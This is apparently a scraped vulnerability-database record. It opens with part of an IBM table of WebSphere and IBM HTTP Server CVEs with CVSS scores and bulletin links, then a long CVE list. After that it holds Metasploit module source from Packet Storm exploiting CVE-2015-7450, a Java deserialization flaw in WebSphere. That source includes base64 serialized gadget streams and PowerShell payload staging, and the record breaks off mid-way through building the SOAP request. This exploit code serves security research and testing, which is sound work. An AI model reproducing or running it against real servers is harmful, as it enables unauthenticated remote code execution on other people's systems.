| 5.1 | Not affected | [Command execution](<http://www-01.ibm.com/support/docview.wss?uid=swg21635991>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-1768 | 10 | [Deserialization](<http://www-01.ibm.com/support/docview.wss?uid=swg21635999>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2013-1571 | 4.3 | [Clickjacking](<http://www-01.ibm.com/support/docview.wss?uid=swg21641387>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0599 | 5 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5 \n| CVE-2013-0597 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21635998>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2013-0596 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21647522>) | Not affected | 6.1 \n| CVE-2013-0565 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5 \n| CVE-2013-0544 | 3.5 | [File directory traversal](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0543 | 6.8 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0542 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0541 | 1.9 | [Buffer overflow](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0540 | 4.9 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | Liberty \n| CVE-2013-0482 | 2.6 | [Spoofing](<http://www-01.ibm.com/support/docview.wss?uid=swg21634646>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0467 | 4 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5 \n| CVE-2013-0464 | 4.3 | [Execute code](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5, 8.0, \n| CVE-2013-0462 | 6.5 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2013-0461 | 1.2 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21622444>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0460 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21622444>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0459 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21622444>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0458 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21622444>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0443 | 4 | [IBM Java SDK for Feb 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21627634>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0440 | 5 | [IBM Java SDK for Feb 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21627634>) | Not affected | 8.5, 8.0, 7.0, 6.1 \nLucky Thirteen | CVE-2013-0169 | 4.3 | [IBM Java SDK for Feb 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21627634>) | [Side Channel Attack](<http://www-01.ibm.com/support/docview.wss?uid=swg21635988>) | 8.5, 8.0, 7.0, 6.1 \n \n**2012 CVEs**\n\n**Name**\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2012-6153 | 4.3 | [Spoofing Vulnerability](<https://www.ibm.com/support/pages/node/6453091>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2012-5783 | 4.3 | [Spoofing attacks](<http://www-01.ibm.com/support/docview.wss?uid=swg22016216>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2012-4853 | 4.3 | [Cross-site request Forgery](<http://www-01.ibm.com/support/docview.wss?uid=swg21614265>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-4851 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21614265>) | Not affected | Liberty \n| CVE-2012-4850 | 7.5 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=swg21614265>) | Not affected | Liberty \n| CVE-2012-3330 | 5 | [Denial of Servic](<http://www-01.ibm.com/support/docview.wss?uid=swg21614265>)e | Not affected | 8.5, 8.0, 7.0 \n| CVE-2012-3325 | 6 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21609067>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-3311 | 3 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21611313>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2012-3306 | 4.3 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg21611313>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2012-3305 | 5.8 | [File directory traversal](<http://www-01.ibm.com/support/docview.wss?uid=swg21611313>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-3304 | 6.8 | [Hijack session](<http://www-01.ibm.com/support/docview.wss?uid=swg21611313>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-3293 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21611313>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-2191 | 5 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21606096>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-2190 | 5 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21606096>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-2170 | 4.3 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21595172>) | Not affected | 8.0, 7.0, 6.1 \n| CVE-2012-2159 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21606096>) | Not affected | 8.5, 8.0 \n| CVE-2012-2098 | 5 | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21644047>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-1148 | 5 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21988026>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2012-1007 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2012-0876 | 5 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21988026>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2012-0720 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 8.0, 7.0, 6.1 \n| CVE-2012-0717 | 2.6 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 7.0, 6.1 \n| CVE-2012-0716 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 8.0, 7.0, 6.1 \n| CVE-2012-0193 | 5 | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 8.0, 7.0, 6.1 \n \n**2011 CVEs**\n\n**Name**\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2011-4889 | 5 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 8.0, 7.0, 6.1 \n| CVE-2011-4343 | 5 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg22008707>) | Not affected | 8.5, 8.0, Liberty \n| CVE-2011-1498 | 5 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6453091>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2011-1377 | 2.1 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg21589257>) | Not affected | 8.0, 7.0, 6.1 \n| CVE-2011-1376 | 4.4 | [Insecure permissions](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 8.0, 7.0, 6.1 \n \n**Important note: **IBM strongly suggests that all System z customers be subscribed to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [System z Security web site](<https://www.ibm.com/it-infrastructure/z/capabilities/system-integrity>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n[{\"Product\":{\"code\":\"SSEQTP\",\"label\":\"WebSphere Application Server\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Security\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF012\",\"label\":\"IBM i\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF035\",\"label\":\"z\\/OS\"}],\"Version\":\"9.0.0.0;8.5.5;8.5;8.0;7.0;6.1\",\"Edition\":\"Advanced;Base;Developer;Express;Liberty;Network Deployment\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Product\":{\"code\":\"SSEQTJ\",\"label\":\"IBM HTTP Server\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud \\u0026 Data Platform\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"SSCKBL\",\"label\":\"WebSphere Application Server Hypervisor Edition\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Product\":{\"code\":\"SSD28V\",\"label\":\"WebSphere Application Server Liberty Core\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-13T18:04:48", "type": "ibm", "title": "WebSphere Application Server and IBM HTTP Server Security Bulletin List", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1376", "CVE-2011-1377", "CVE-2011-1498", "CVE-2011-4343", "CVE-2011-4889", "CVE-2012-0193", "CVE-2012-0716", "CVE-2012-0717", "CVE-2012-0720", "CVE-2012-0876", "CVE-2012-1007", "CVE-2012-1148", "CVE-2012-2098", "CVE-2012-2159", "CVE-2012-2170", "CVE-2012-2190", "CVE-2012-2191", "CVE-2012-3293", "CVE-2012-3304", "CVE-2012-3305", "CVE-2012-3306", "CVE-2012-3311", "CVE-2012-3325", "CVE-2012-3330", "CVE-2012-4850", "CVE-2012-4851", "CVE-2012-4853", "CVE-2012-5783", "CVE-2012-6153", "CVE-2013-0169", "CVE-2013-0440", "CVE-2013-0443", "CVE-2013-0458", "CVE-2013-0459", "CVE-2013-0460", "CVE-2013-0461", "CVE-2013-0462", "CVE-2013-0464", "CVE-2013-0467", "CVE-2013-0482", "CVE-2013-0540", "CVE-2013-0541", "CVE-2013-0542", "CVE-2013-0543", "CVE-2013-0544", "CVE-2013-0565", "CVE-2013-0596", "CVE-2013-0597", "CVE-2013-0599", "CVE-2013-1571", "CVE-2013-1768", "CVE-2013-1862", "CVE-2013-1896", "CVE-2013-2967", "CVE-2013-2976", "CVE-2013-3024", "CVE-2013-3029", "CVE-2013-4004", "CVE-2013-4005", "CVE-2013-4006", "CVE-2013-4039", "CVE-2013-4052", "CVE-2013-4053", "CVE-2013-5372", "CVE-2013-5414", "CVE-2013-5417", "CVE-2013-5418", "CVE-2013-5425", "CVE-2013-5704", "CVE-2013-5780", "CVE-2013-5802", "CVE-2013-6323", "CVE-2013-6325", "CVE-2013-6329", "CVE-2013-6330", "CVE-2013-6438", "CVE-2013-6440", "CVE-2013-6725", "CVE-2013-6738", "CVE-2013-6747", "CVE-2014-0050", "CVE-2014-0076", "CVE-2014-0098", "CVE-2014-0114", "CVE-2014-0118", "CVE-2014-0160", "CVE-2014-0226", "CVE-2014-0231", "CVE-2014-0411", "CVE-2014-0453", "CVE-2014-0460", "CVE-2014-0823", "CVE-2014-0857", "CVE-2014-0859", "CVE-2014-0878", "CVE-2014-0891", "CVE-2014-0896", "CVE-2014-0963", "CVE-2014-0964", "CVE-2014-0965", "CVE-2014-3021", "CVE-2014-3022", "CVE-2014-3068", "CVE-2014-3070", "CVE-2014-3083", "CVE-2014-3566", "CVE-2014-3577", "CVE-2014-3603", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-4764", "CVE-2014-4767", "CVE-2014-4770", "CVE-2014-4816", "CVE-2014-6164", "CVE-2014-6166", "CVE-2014-6167", "CVE-2014-6174", "CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-6457", "CVE-2014-6512", "CVE-2014-6558", "CVE-2014-6593", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7189", "CVE-2014-7810", "CVE-2014-8730", "CVE-2014-8890", "CVE-2014-8917", "CVE-2015-0138", "CVE-2015-0174", "CVE-2015-0175", "CVE-2015-0204", "CVE-2015-0226", "CVE-2015-0235", "CVE-2015-0250", "CVE-2015-0254", "CVE-2015-0400", "CVE-2015-0410", "CVE-2015-0478", "CVE-2015-0488", "CVE-2015-0899", "CVE-2015-1283", "CVE-2015-1788", "CVE-2015-1829", "CVE-2015-1882", "CVE-2015-1885", "CVE-2015-1916", "CVE-2015-1920", "CVE-2015-1927", "CVE-2015-1931", "CVE-2015-1932", "CVE-2015-1936", "CVE-2015-1946", "CVE-2015-2017", "CVE-2015-2601", "CVE-2015-2613", "CVE-2015-2625", "CVE-2015-2808", "CVE-2015-3183", "CVE-2015-4000", "CVE-2015-4734", "CVE-2015-4749", "CVE-2015-4872", "CVE-2015-4938", "CVE-2015-4947", "CVE-2015-5006", "CVE-2015-5262", "CVE-2015-7417", "CVE-2015-7420", "CVE-2015-7450", "CVE-2015-7575", "CVE-2016-0201", "CVE-2016-0283", "CVE-2016-0306", "CVE-2016-0359", "CVE-2016-0360", "CVE-2016-0377", "CVE-2016-0378", "CVE-2016-0385", "CVE-2016-0389", "CVE-2016-0466", "CVE-2016-0475", "CVE-2016-0488", "CVE-2016-0702", "CVE-2016-0718", "CVE-2016-0800", "CVE-2016-1000031", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-2183", "CVE-2016-2923", "CVE-2016-2945", "CVE-2016-2960", "CVE-2016-3040", "CVE-2016-3042", "CVE-2016-3092", "CVE-2016-3426", "CVE-2016-3427", "CVE-2016-3485", "CVE-2016-4472", "CVE-2016-4975", "CVE-2016-5387", "CVE-2016-5546", "CVE-2016-5547", "CVE-2016-5548", "CVE-2016-5549", "CVE-2016-5573", "CVE-2016-5597", "CVE-2016-5983", "CVE-2016-5986", "CVE-2016-7056", "CVE-2016-8743", "CVE-2016-8919", "CVE-2016-8934", "CVE-2016-9736", "CVE-2017-10102", "CVE-2017-10115", "CVE-2017-10116", "CVE-2017-10356", "CVE-2017-10388", "CVE-2017-1121", "CVE-2017-1137", "CVE-2017-1151", "CVE-2017-1194", "CVE-2017-12613", "CVE-2017-12618", "CVE-2017-12624", "CVE-2017-1380", "CVE-2017-1381", "CVE-2017-1382", "CVE-2017-1501", "CVE-2017-1503", "CVE-2017-1504", "CVE-2017-15710", "CVE-2017-15715", "CVE-2017-1583", "CVE-2017-1681", "CVE-2017-1731", "CVE-2017-1741", "CVE-2017-1743", "CVE-2017-1788", "CVE-2017-3167", "CVE-2017-3511", "CVE-2017-3732", "CVE-2017-3736", "CVE-2017-5638", "CVE-2017-7668", "CVE-2017-7679", "CVE-2017-9798", "CVE-2018-10237", "CVE-2018-12539", "CVE-2018-12547", "CVE-2018-1301", "CVE-2018-1388", "CVE-2018-1426", "CVE-2018-1427", "CVE-2018-1447", "CVE-2018-1553", "CVE-2018-1567", "CVE-2018-1614", "CVE-2018-1621", "CVE-2018-1626", "CVE-2018-1643", "CVE-2018-1656", "CVE-2018-1683", "CVE-2018-1695", "CVE-2018-1719", "CVE-2018-17199", "CVE-2018-1755", "CVE-2018-1767", "CVE-2018-1770", "CVE-2018-1777", "CVE-2018-1793", "CVE-2018-1794", "CVE-2018-1797", "CVE-2018-1798", "CVE-2018-1840", "CVE-2018-1851", "CVE-2018-1890", "CVE-2018-1901", "CVE-2018-1902", "CVE-2018-1904", "CVE-2018-1905", "CVE-2018-1926", "CVE-2018-1957", "CVE-2018-1996", "CVE-2018-20843", "CVE-2018-25031", "CVE-2018-2579", "CVE-2018-2602", "CVE-2018-2603", "CVE-2018-2633", "CVE-2018-2634", "CVE-2018-2637", "CVE-2018-2783", "CVE-2018-2800", "CVE-2018-3139", "CVE-2018-3180", "CVE-2018-8039", "CVE-2019-0211", "CVE-2019-0220", "CVE-2019-10086", "CVE-2019-10092", "CVE-2019-10098", "CVE-2019-11777", "CVE-2019-12402", "CVE-2019-12406", "CVE-2019-17495", "CVE-2019-17566", "CVE-2019-17573", "CVE-2019-2426", "CVE-2019-2949", "CVE-2019-2989", "CVE-2019-4030", "CVE-2019-4046", "CVE-2019-4080", "CVE-2019-4268", "CVE-2019-4269", "CVE-2019-4270", "CVE-2019-4271", "CVE-2019-4279", "CVE-2019-4285", "CVE-2019-4304", "CVE-2019-4305", "CVE-2019-4441", "CVE-2019-4442", "CVE-2019-4477", "CVE-2019-4505", "CVE-2019-4663", "CVE-2019-4670", "CVE-2019-4720", "CVE-2019-4732", "CVE-2019-9512", "CVE-2019-9513", "CVE-2019-9514", "CVE-2019-9515", "CVE-2019-9517", "CVE-2019-9518", "CVE-2020-10693", "CVE-2020-11985", "CVE-2020-13938", "CVE-2020-14577", "CVE-2020-14578", "CVE-2020-14579", "CVE-2020-14581", "CVE-2020-14621", "CVE-2020-14781", "CVE-2020-14782", "CVE-2020-14797", "CVE-2020-1927", "CVE-2020-1934", "CVE-2020-2590", "CVE-2020-2593", "CVE-2020-2601", "CVE-2020-2654", "CVE-2020-27221", "CVE-2020-2754", "CVE-2020-2755", "CVE-2020-2773", "CVE-2020-2781", "CVE-2020-2800", "CVE-2020-4163", "CVE-2020-4276", "CVE-2020-4303", "CVE-2020-4304", "CVE-2020-4329", "CVE-2020-4362", "CVE-2020-4365", "CVE-2020-4421", "CVE-2020-4448", "CVE-2020-4449", "CVE-2020-4450", "CVE-2020-4464", "CVE-2020-4534", "CVE-2020-4575", "CVE-2020-4576", "CVE-2020-4578", "CVE-2020-4589", "CVE-2020-4590", "CVE-2020-4629", "CVE-2020-4643", "CVE-2020-4782", "CVE-2020-4949", "CVE-2020-5016", "CVE-2020-5258", "CVE-2021-20353", "CVE-2021-20354", "CVE-2021-20453", "CVE-2021-20454", "CVE-2021-20480", "CVE-2021-20492", "CVE-2021-20517", "CVE-2021-2161", "CVE-2021-23450", "CVE-2021-2369", "CVE-2021-26296", "CVE-2021-26690", "CVE-2021-26691", "CVE-2021-29736", "CVE-2021-29754", "CVE-2021-29842", "CVE-2021-30641", "CVE-2021-34798", "CVE-2021-35517", "CVE-2021-35550", "CVE-2021-35564", "CVE-2021-35578", "CVE-2021-35603", "CVE-2021-36090", "CVE-2021-38951", "CVE-2021-39031", "CVE-2021-39038", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-4104", "CVE-2021-44224", "CVE-2021-44228", "CVE-2021-44790", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2021-45960", "CVE-2021-46143", "CVE-2021-46708", "CVE-2022-21229", "CVE-2022-21299", "CVE-2022-21340", "CVE-2022-21496", "CVE-2022-22310", "CVE-2022-22365", "CVE-2022-22393", "CVE-2022-22473", "CVE-2022-22475", "CVE-2022-22476", "CVE-2022-22477", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-22822", "CVE-2022-22823", "CVE-2022-22824", "CVE-2022-22825", "CVE-2022-22826", "CVE-2022-22827", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23852", "CVE-2022-23990", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25313", "CVE-2022-25315", "CVE-2022-26377", "CVE-2022-28614", "CVE-2022-28615", "CVE-2022-29404", "CVE-2022-30556", "CVE-2022-31813"], "modified": "2022-07-13T18:04:48", "id": "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "href": "https://www.ibm.com/support/pages/node/710969", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "packetstorm", "title": "IBM WebSphere Remote Code Execution Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141631", "href": "https://packetstormsecurity.com/files/141631/IBM-WebSphere-Remote-Code-Execution-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"IBM WebSphere RCE Java Deserialization Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization \ncall of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows \nremote arbitrary code execution. Authentication is not required in order to exploit this vulnerability. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Liatsis Fotios @liatsisfotios' # Metasploit Module \n \n# Thanks for helping me: \n# # # # # # # # # # # # \n \n# Kyprianos Vasilopoulos @kavasilo # Implemented and reviewed - Metasploit module \n# Dimitriadis Alexios @AlxDm_ # Assistance and code check \n# Kotsiopoulos Panagiotis # Guidance about Size and Buffer implementation \n], \n'References' => \n[ \n['CVE', '2015-7450'], \n['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'], \n['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'], \n['URL', 'https://www.tenable.com/plugins/index.php?view=single&id=87171'] \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'IBM WebSphere 7.0.0.0', {} ] \n], \n'DisclosureDate' => \"Nov 6 2015\", \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'WfsDelay' => 20 \n})) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base IBM\\'s WebSphere SOAP path', '/']), \nOpt::RPORT('8880') \n], self.class) \nend \n \n \ndef exploit \n# Decode - Generate - Set Payload / Send SOAP Request \nsoap_request(set_payload) \nend \n \ndef set_payload \n# CommonCollections1 Serialized Streams \nccs_start = \"rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQ=\" \nccs_end = \"dAAEZXhlY3VxAH4AHgAAAAFxAH4AI3NxAH4AEXNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAEHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB+ADo=\" \n \n# Generate Payload \npayload_exec = invoke_ccs(ccs_start) + gen_payload + invoke_ccs(ccs_end) \npayload_exec = Rex::Text.encode_base64(payload_exec) \nend \n \ndef invoke_ccs(serialized_stream) \n# Decode Serialized Streams \nserialized_stream = Rex::Text.decode_base64(serialized_stream) \nend \n \ndef gen_payload \n# Staging Native Payload \nexec_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first) \nexec_cmd = exec_cmd.gsub(\"%COMSPEC% /b /c start /b /min \", \"\") \n \n# Size up RCE - Buffer \ncmd_lng = exec_cmd.length \nlng2str = \"0\" + cmd_lng.to_s(16) \nbuff = [lng2str].pack(\"H*\") \n \nrce_pld = buff + exec_cmd \nend \n \ndef soap_request(inject_payload) \n# SOAP Request \nreq = \"<?xml 